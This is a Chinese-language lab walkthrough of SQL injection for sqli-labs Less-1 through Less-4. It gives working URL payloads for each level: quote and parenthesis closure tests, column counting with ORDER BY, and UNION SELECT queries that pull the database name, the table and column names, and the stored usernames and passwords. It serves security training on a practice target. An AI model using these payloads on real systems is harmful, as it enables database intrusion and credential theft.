sqli-labs测试Less-1到Less-4

Less-1单引号闭合

1、正常页面
2、输入单引号后，页面出现报错信息。
http://192.168.195.110/sqli-labs/Less-1/?id=1’
http://192.168.195.110/sqli-labs/Less-1/?id=1’ and 1=1 – +显示正常

http://192.168.195.110/sqli-labs/Less-1/?id=1’ and 1=2 – + 显示异常
说明存在注入漏洞

3、order by 断段列数，到4时，页面显示异常，说明前面查询了3列。
http://192.168.195.110/sqli-labs/Less-1/?id=1’ order by 4 – +

4、确认回显位置：
192.168.195.110/sqli-labs/Less-1/?id=-1’ union select 1,2,3 – +

返回结果可以看出2和3的位置可以进行语句替换

5、获取数据库名
192.168.195.110/sqli-labs/Less-1/?id=-1’ union select 1,database(),3 – +

6、获取数据表名
192.168.195.110/sqli-labs/Less-1/?id=-1’ union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=“security” – +

users表为我们要找的用户信息表。

7、获取数据表中的字段：
192.168.195.110/sqli-labs/Less-1/?id=-1’ union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=“security” and table_name=“users” – +

username和password字段为需要获取信息。

8、列出字段信息
192.168.195.110/sqli-labs/Less-1/?id=-1’ union select 1,group_concat(username,0x3a,password),3 from users – +
用户名和密码之间以分号（:）隔开，0x3a表示分号

Less-2 数字型

1、and 1=1 显示正常
http://192.168.195.110/sqli-labs/Less-2/?id=1 and 1=1 – +

2、and 1=2 显示异常
http://192.168.195.110/sqli-labs/Less-2/?id=1 and 1=2 – +

3、获取数据库信息
语句请参考Less-1

Less-3 闭合方式 ')

1、输入单引号后，跟提示发现有个)
http://192.168.195.110/sqli-labs/Less-3/?id=1’

2、可以尝试通过 ‘）来闭合测试
http://192.168.195.110/sqli-labs/Less-3/?id=1’) and 1=1 – + 显示正常

http://192.168.195.110/sqli-labs/Less-3/?id=1’) and 1=2 – + 显示异常

3、获取数据库信息
语句请参考Less-1

Less-4 闭合方式 ")

1、先尝试用双引号闭合，
http://192.168.195.110/sqli-labs/Less-4/?id=1%22

2、跟据报错信息，尝试用 “)闭合测试
http://192.168.195.110/sqli-labs/Less-4/?id=1”) and 1=1 – +
显示正常

http://192.168.195.110/sqli-labs/Less-4/?id=1") and 1=2 – +
显示异常

3、获取数据库信息
http://192.168.195.110/sqli-labs/Less-4/?id=-1") union select 1,database(),3 – +

其他语句请参考Less-1